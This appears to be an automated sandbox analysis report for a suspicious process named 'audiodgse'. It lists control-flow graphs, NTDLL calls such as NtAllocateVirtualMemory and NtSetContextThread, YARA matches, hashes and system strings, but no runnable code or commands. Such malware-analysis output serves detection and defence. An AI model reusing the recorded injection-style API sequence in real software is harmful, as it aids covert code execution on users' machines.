                                                                                control_flow_graph 209 40ac53-40ac72 210 40ac78-40acb7 call 409633 209->210 211 40ac73 call 409623 209->211 214 40ad95-40adc6 NtReadFile 210->214 215 40acbd-40ad02 call 4096c3 call 42b532 call 409593 call 42b532 210->215 211->210 216 40ae63-40ae6f 214->216 217 40adcc-40add3 214->217 237 40ad0d-40ad13 215->237 219 40adde-40ade4 217->219 221 40ade6-40ae0a 219->221 222 40ae0c-40ae10 219->222 221->219 225 40ae52-40ae60 call 4096c3 222->225 226 40ae12-40ae19 222->226 225->216 228 40ae24-40ae2a 226->228 228->225 231 40ae2c-40ae50 228->231 231->228 238 40ad15-40ad39 237->238 239 40ad3b-40ad3f 237->239 238->237 239->214 241 40ad41-40ad5c 239->241 242 40ad67-40ad6d 241->242 242->214 243 40ad6f-40ad93 242->243 243->242
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040ADB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: e74ae992bb3d009c9f20b83afac30aed867dbe66c523473f5ce2b7006463fa21
                                                                                • Instruction ID: d9d231fd9407a7b75bcb779410c8a4ea6478d98f70c1925c33a9e8d091ad51c7
                                                                                • Opcode Fuzzy Hash: e74ae992bb3d009c9f20b83afac30aed867dbe66c523473f5ce2b7006463fa21
                                                                                • Instruction Fuzzy Hash: B3716DB1E04258DFCB04CFA9D880AEDBBF2AF4D314F18806AE459B7341D638A952CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 245 40b4e3-40b502 246 40b508-40b547 call 409633 245->246 247 40b503 call 409623 245->247 250 40b625-40b64a NtAllocateVirtualMemory 246->250 251 40b54d-40b592 call 4096c3 call 42b532 call 409593 call 42b532 246->251 247->246 253 40b650-40b657 250->253 254 40b6e7-40b6f3 250->254 273 40b59d-40b5a3 251->273 256 40b662-40b668 253->256 258 40b690-40b694 256->258 259 40b66a-40b68e 256->259 262 40b6d6-40b6e4 call 4096c3 258->262 263 40b696-40b69d 258->263 259->256 262->254 265 40b6a8-40b6ae 263->265 265->262 268 40b6b0-40b6d4 265->268 268->265 274 40b5a5-40b5c9 273->274 275 40b5cb-40b5cf 273->275 274->273 275->250 277 40b5d1-40b5ec 275->277 278 40b5f7-40b5fd 277->278 278->250 279 40b5ff-40b623 278->279 279->278
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B63D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 7fc2ac169f65d63aed7386de27c8c8a86228478a9c14cbda19a6e7c6e6e2a915
                                                                                • Instruction ID: d9cd4ce1c7d1b2207bd79fde927acf96c457bf2f55d601028e23877637c269b1
                                                                                • Opcode Fuzzy Hash: 7fc2ac169f65d63aed7386de27c8c8a86228478a9c14cbda19a6e7c6e6e2a915
                                                                                • Instruction Fuzzy Hash: AD713E71D04158DFCB04CFA9C890AEDBBF1AF49314F1884AAE459B7341D739A942CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 390 40b0c3-40b127 call 409623 call 409633 395 40b205-40b21b NtDelayExecution 390->395 396 40b12d-40b172 call 4096c3 call 42b532 call 409593 call 42b532 390->396 398 40b221-40b228 395->398 399 40b2b8-40b2c4 395->399 418 40b17d-40b183 396->418 401 40b233-40b239 398->401 402 40b261-40b265 401->402 403 40b23b-40b25f 401->403 407 40b2a7-40b2b5 call 4096c3 402->407 408 40b267-40b26e 402->408 403->401 407->399 410 40b279-40b27f 408->410 410->407 413 40b281-40b2a5 410->413 413->410 419 40b185-40b1a9 418->419 420 40b1ab-40b1af 418->420 419->418 420->395 422 40b1b1-40b1cc 420->422 423 40b1d7-40b1dd 422->423 423->395 424 40b1df-40b203 423->424 424->423
                                                                                APIs
                                                                                • NtDelayExecution.NTDLL(0041A351,?,?,?,00000000), ref: 0040B20E
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DelayExecution
                                                                                • String ID:
                                                                                • API String ID: 1249177460-0
                                                                                • Opcode ID: 5b9e4acfb40e016333600f926676569ad617c8d302ec00ee1b698c524a8cb09b
                                                                                • Instruction ID: e048c66c90e4851d7f5ae89e7e30963991b309d615cc2a19df421898bdfdf5c8
                                                                                • Opcode Fuzzy Hash: 5b9e4acfb40e016333600f926676569ad617c8d302ec00ee1b698c524a8cb09b
                                                                                • Instruction Fuzzy Hash: 96715E71D04158DFCB04CFA9C894AEDBBF1AF49314F1880AAE455B7391D738AA42CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 281 409b83-409ba2 282 409ba8-409be7 call 409633 281->282 283 409ba3 call 409623 281->283 286 409cc5-409cda NtSuspendThread 282->286 287 409bed-409c32 call 4096c3 call 42b532 call 409593 call 42b532 282->287 283->282 289 409ce0-409ce7 286->289 290 409d77-409d83 286->290 309 409c3d-409c43 287->309 292 409cf2-409cf8 289->292 293 409d20-409d24 292->293 294 409cfa-409d1e 292->294 296 409d66-409d74 call 4096c3 293->296 297 409d26-409d2d 293->297 294->292 296->290 301 409d38-409d3e 297->301 301->296 304 409d40-409d64 301->304 304->301 310 409c45-409c69 309->310 311 409c6b-409c6f 309->311 310->309 311->286 313 409c71-409c8c 311->313 314 409c97-409c9d 313->314 314->286 315 409c9f-409cc3 314->315 315->314
                                                                                APIs
                                                                                • NtSuspendThread.NTDLL(?,?), ref: 00409CCD
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SuspendThread
                                                                                • String ID:
                                                                                • API String ID: 3178671153-0
                                                                                • Opcode ID: bf8782ecbf2c95be6fe9d0fe60641b5eec531598c49e807e30cc65192896bdca
                                                                                • Instruction ID: b376e9e30858225105df3b30728deaaaca8452c14dbf1086a7431d420a92b10e
                                                                                • Opcode Fuzzy Hash: bf8782ecbf2c95be6fe9d0fe60641b5eec531598c49e807e30cc65192896bdca
                                                                                • Instruction Fuzzy Hash: D1713E71E04158DFDB04CFA9D490AEDBBF1AF49314F1880AAE459B7382D638AE42DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 317 409d93-409db2 318 409db8-409df7 call 409633 317->318 319 409db3 call 409623 317->319 323 409ed5-409eea NtGetContextThread 318->323 324 409dfd-409e42 call 4096c3 call 42b532 call 409593 call 42b532 318->324 319->318 325 409ef0-409ef7 323->325 326 409f87-409f93 323->326 346 409e4d-409e53 324->346 329 409f02-409f08 325->329 331 409f30-409f34 329->331 332 409f0a-409f2e 329->332 335 409f76-409f84 call 4096c3 331->335 336 409f36-409f3d 331->336 332->329 335->326 337 409f48-409f4e 336->337 337->335 342 409f50-409f74 337->342 342->337 347 409e55-409e79 346->347 348 409e7b-409e7f 346->348 347->346 348->323 350 409e81-409e9c 348->350 351 409ea7-409ead 350->351 351->323 352 409eaf-409ed3 351->352 352->351
                                                                                APIs
                                                                                • NtGetContextThread.NTDLL(?,?), ref: 00409EDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ContextThread
                                                                                • String ID:
                                                                                • API String ID: 1591575202-0
                                                                                • Opcode ID: 52ad50334c255c4bbc1a29d08aca0dc2c4fff3cd9f9b47a11d1322f589b0992f
                                                                                • Instruction ID: 3d789b86ce1946b0985d3b518a6e9646d29308825b337125d9b980950b9974f6
                                                                                • Opcode Fuzzy Hash: 52ad50334c255c4bbc1a29d08aca0dc2c4fff3cd9f9b47a11d1322f589b0992f
                                                                                • Instruction Fuzzy Hash: E9715171E04158DFCB05CFA9C490AEDBBF1AF49314F18806AE459B7391D638AE42CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 354 409fa3-409fc2 355 409fc8-40a007 call 409633 354->355 356 409fc3 call 409623 354->356 359 40a0e5-40a0fa NtSetContextThread 355->359 360 40a00d-40a052 call 4096c3 call 42b532 call 409593 call 42b532 355->360 356->355 362 40a100-40a107 359->362 363 40a197-40a1a3 359->363 382 40a05d-40a063 360->382 365 40a112-40a118 362->365 366 40a140-40a144 365->366 367 40a11a-40a13e 365->367 369 40a186-40a194 call 4096c3 366->369 370 40a146-40a14d 366->370 367->365 369->363 373 40a158-40a15e 370->373 374 40a14f-40a155 370->374 373->369 379 40a160-40a184 373->379 374->373 379->374 383 40a065-40a089 382->383 384 40a08b-40a08f 382->384 383->382 384->359 385 40a091-40a0ac 384->385 387 40a0b7-40a0bd 385->387 387->359 388 40a0bf-40a0e3 387->388 388->387
                                                                                APIs
                                                                                • NtSetContextThread.NTDLL(?,?), ref: 0040A0ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ContextThread
                                                                                • String ID:
                                                                                • API String ID: 1591575202-0
                                                                                • Opcode ID: d0d2c1773b7b796d0ebfe3256164d8135c2e7cb34cad1a27fa221491c0f598b6
                                                                                • Instruction ID: d8e3954c3346301d023c50184e95f07bd9294836662a62bbbe0d7a18433939c8
                                                                                • Opcode Fuzzy Hash: d0d2c1773b7b796d0ebfe3256164d8135c2e7cb34cad1a27fa221491c0f598b6
                                                                                • Instruction Fuzzy Hash: DB716070E0425CDFCB04CFA9C890AEDBBF1AF49314F18806AE459B7341D639AA52DF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417115
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                • Instruction ID: 700da5ef7252c009899ee09247c01b7f76a84e4fd7011e79acc56ebad7c5d63d
                                                                                • Opcode Fuzzy Hash: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                • Instruction Fuzzy Hash: E1015EB2E0020DBBDF10DAA1DC42FDEB7B8AB54304F00819AE90897240F675EB548B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(0041A2F8,?,?,00000000,?,0041A2F8,?,?,?,?,?,?,?,?,00000000,?), ref: 0042817A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 345f8a6aa1ddee74f444b40be7ea482dfe8237dd67751767400b13a6b06a0507
                                                                                • Instruction ID: cf41639879e379ce192c89174723f4cad139a76cea43576b8d63bcd0411fa1f3
                                                                                • Opcode Fuzzy Hash: 345f8a6aa1ddee74f444b40be7ea482dfe8237dd67751767400b13a6b06a0507
                                                                                • Instruction Fuzzy Hash: C3E086362002147BE520EB5ADC41F9B775CDFC5710F40401AFA08A7186CAB17A11C7F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ce2f11bf2994786dcafbe6a56b1256c54bed4712b13bef0dc55a9b666457006b
                                                                                • Instruction ID: d8527d923f11b0b532851ca60aa20acf18da4f6ff4c3422131841b2a5f571203
                                                                                • Opcode Fuzzy Hash: ce2f11bf2994786dcafbe6a56b1256c54bed4712b13bef0dc55a9b666457006b
                                                                                • Instruction Fuzzy Hash: 0A90026121240003410571584854656400E97E0341B55C021E2055590DC52589916625
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 809f56127f72ca241e5a45f10c6b02ad5fee20def11a2a9c4b17d6035777e570
                                                                                • Instruction ID: 99abf4ae0b9fd376f63d565de7b3a5bbb1b0308e44b696df82f6b9e00802e1ec
                                                                                • Opcode Fuzzy Hash: 809f56127f72ca241e5a45f10c6b02ad5fee20def11a2a9c4b17d6035777e570
                                                                                • Instruction Fuzzy Hash: 5B90023121140413D11171584944747000D97D0381F95C412A1465558DD6568A52A621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a760bbecd22982c82b55f7163a4098641c1a6eba19c5485c6092e1822b4c187d
                                                                                • Instruction ID: 689cb50fcd7c3aaf99a598224d52c3f9c467fa698e1d07973da1eda1aa4148c8
                                                                                • Opcode Fuzzy Hash: a760bbecd22982c82b55f7163a4098641c1a6eba19c5485c6092e1822b4c187d
                                                                                • Instruction Fuzzy Hash: 8B90023121148802D1107158884478A000997D0341F59C411A5465658DC69589917621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 50c38ea0a1eae905dbd88a0f9b8b97084128328a68f8b2a0df5a14265d7a5636
                                                                                • Instruction ID: bb77f1891e81ea576e98e578fcd0781c01074a8d18f4358667d3dff7d1f1839a
                                                                                • Opcode Fuzzy Hash: 50c38ea0a1eae905dbd88a0f9b8b97084128328a68f8b2a0df5a14265d7a5636
                                                                                • Instruction Fuzzy Hash: 6B90023161550402D10071584954746100997D0341F65C411A1465568DC7958A516AA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(5E6172K3r,00000111,00000000,00000000), ref: 00413920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: 5E6172K3r$5E6172K3r
                                                                                • API String ID: 1836367815-4099027662
                                                                                • Opcode ID: 58165c23ca668ae75b750688ac898c4ca9524c06c04bcf17f2a40e1166722cdb
                                                                                • Instruction ID: 44d3ac15c076041f8dc1a2508ba11932197c5fe31bb351a94804a490dcc78c20
                                                                                • Opcode Fuzzy Hash: 58165c23ca668ae75b750688ac898c4ca9524c06c04bcf17f2a40e1166722cdb
                                                                                • Instruction Fuzzy Hash: DB110271E412587AEB21AAA19C02FDF7B7C8F41714F04415AFA047B281E6B85706C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 53 41389b-4138b3 54 4138bc-413911 call 42a9e3 call 4170a3 call 404683 call 423ae3 53->54 55 4138b7 call 429fd3 53->55 65 413933-413938 54->65 66 413913-413924 PostThreadMessageW 54->66 55->54 66->65 67 413926-413930 66->67 67->65
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(5E6172K3r,00000111,00000000,00000000), ref: 00413920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: 5E6172K3r$5E6172K3r
                                                                                • API String ID: 1836367815-4099027662
                                                                                • Opcode ID: 8abed7ddc811d22eec31aea6a0b0e8b8d95a05367153f297274ca6a15ec7c56e
                                                                                • Instruction ID: cddd0c635331ea0f0390ab08d00b8aea21645718bdd3232dc21e14fad9dfd9d1
                                                                                • Opcode Fuzzy Hash: 8abed7ddc811d22eec31aea6a0b0e8b8d95a05367153f297274ca6a15ec7c56e
                                                                                • Instruction Fuzzy Hash: 7811E971D4125876DB119B91DD02FDFBB7C9F41B24F104069FA007B281D6B95706C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(5E6172K3r,00000111,00000000,00000000), ref: 00413920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: 5E6172K3r$5E6172K3r
                                                                                • API String ID: 1836367815-4099027662
                                                                                • Opcode ID: b7d23e844af9b6cdc554bc3077c4114c948852ea1974059ea32152e2dd7faec6
                                                                                • Instruction ID: 7312bd481985f559f28e7b7a28e34e32d4d300c0065bd3b84ebd069d556037bc
                                                                                • Opcode Fuzzy Hash: b7d23e844af9b6cdc554bc3077c4114c948852ea1974059ea32152e2dd7faec6
                                                                                • Instruction Fuzzy Hash: AF01C471E4125876DB219AA1DC02FDF7B7C9F41B14F04805AFA047B281E6F85B06C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 84 413939-41393c 85 413905-413911 84->85 86 41393e-41393f 84->86 87 413933-413938 85->87 88 413913-413924 PostThreadMessageW 85->88 88->87 89 413926-413930 88->89 89->87
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(5E6172K3r,00000111,00000000,00000000), ref: 00413920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: 5E6172K3r$5E6172K3r
                                                                                • API String ID: 1836367815-4099027662
                                                                                • Opcode ID: 74c183a11d8b29955bf00a74eb0ac52ca0eab4788908024bc26ffbbb4b9b7b95
                                                                                • Instruction ID: d78a8f97a5d31ce93953b473a227463da678a9a8dd1a44b2394075c935a16873
                                                                                • Opcode Fuzzy Hash: 74c183a11d8b29955bf00a74eb0ac52ca0eab4788908024bc26ffbbb4b9b7b95
                                                                                • Instruction Fuzzy Hash: 1DE0D8B1A5425CB5D7224A609D42BEEAB3C9F81B15F14805BAF40BB280D6F85B054BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(004196C0,?,?,004196C0,?,?,?,004196C0,?,00002000), ref: 00428432
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5b07569eaf7b7261b56a017df8d6d34dc5f8c84c300f6dee7fbbf08bdb86e0b1
                                                                                • Instruction ID: 6f276af830d84f5bb187b94974730c95ad48bd0cc9abdc6871fa848235fd7ebc
                                                                                • Opcode Fuzzy Hash: 5b07569eaf7b7261b56a017df8d6d34dc5f8c84c300f6dee7fbbf08bdb86e0b1
                                                                                • Instruction Fuzzy Hash: 18E092756002087BE610EF59DC42FAB37ADDFC9710F004419FD08A7282C671BD108BB8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00411F65,?,00411F65,?,00000000,00411F65,?,00411F65,?,?), ref: 0042847F
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 208df4d4598eeb27397e5d91fdbe4a5d488368077dec2fcba7db4a106f96f7e9
                                                                                • Instruction ID: c03d0572de94cc34dbcc703f9e9efc806d917a12b67b2112a54ea8f0f89256c6
                                                                                • Opcode Fuzzy Hash: 208df4d4598eeb27397e5d91fdbe4a5d488368077dec2fcba7db4a106f96f7e9
                                                                                • Instruction Fuzzy Hash: 09E092B52042047BEA10EE59EC45FAB37ACDFC9710F004419FA18A7282CA70BD108BB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,00000000,?,?,2D90950D,?,?,2D90950D), ref: 004284C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 7f05b5b69c950ae9a340a6bd656f86b7eda16330c2b75cdbc658a6a354eb6cfd
                                                                                • Instruction ID: 89ee3de009e2c90c7df1c6bc3a7bd8a78d30abc7397038fcc98f0036e67116d8
                                                                                • Opcode Fuzzy Hash: 7f05b5b69c950ae9a340a6bd656f86b7eda16330c2b75cdbc658a6a354eb6cfd
                                                                                • Instruction Fuzzy Hash: D2E08C712002147BE620EA5AEC42F9BB76CEFC5760F10441AFA08A7282C771BA118AF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c51f824545ce80db550412db07cf04139506cca5b1eb6c2879178d4ebbffb35b
                                                                                • Instruction ID: 2c9e8c46cf0755b948777f015b4ed20f3ace096f98cec6804993b539daf81efd
                                                                                • Opcode Fuzzy Hash: c51f824545ce80db550412db07cf04139506cca5b1eb6c2879178d4ebbffb35b
                                                                                • Instruction Fuzzy Hash: 73B09B719115D5C6DA11E7644A08717790577D0741F56C061D3070641F4738C1D5E775
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2160512332
                                                                                • Opcode ID: 17f9d234e00fb860f070ceea3f6d8d7051e1a1e4969950db1ed339945233befa
                                                                                • Instruction ID: aeefab780d268932e6e9e5fc8ed73bdde5632d41c01a2b100aace03ea2433075
                                                                                • Opcode Fuzzy Hash: 17f9d234e00fb860f070ceea3f6d8d7051e1a1e4969950db1ed339945233befa
                                                                                • Instruction Fuzzy Hash: 6092AE71624342EFE725CE29C888B6BBBE8BB84750F84491DFB96D7250D770E844CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • double initialized or corrupted critical section, xrefs: 012D5508
                                                                                • Thread identifier, xrefs: 012D553A
                                                                                • Critical section debug info address, xrefs: 012D541F, 012D552E
                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 012D5543
                                                                                • Invalid debug info address of this critical section, xrefs: 012D54B6
                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012D54CE
                                                                                • Critical section address., xrefs: 012D5502
                                                                                • 8, xrefs: 012D52E3
                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012D54E2
                                                                                • Address of the debug info found in the active list., xrefs: 012D54AE, 012D54FA
                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012D540A, 012D5496, 012D5519
                                                                                • undeleted critical section in freed memory, xrefs: 012D542B
                                                                                • Critical section address, xrefs: 012D5425, 012D54BC, 012D5534
                                                                                • corrupted critical section, xrefs: 012D54C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
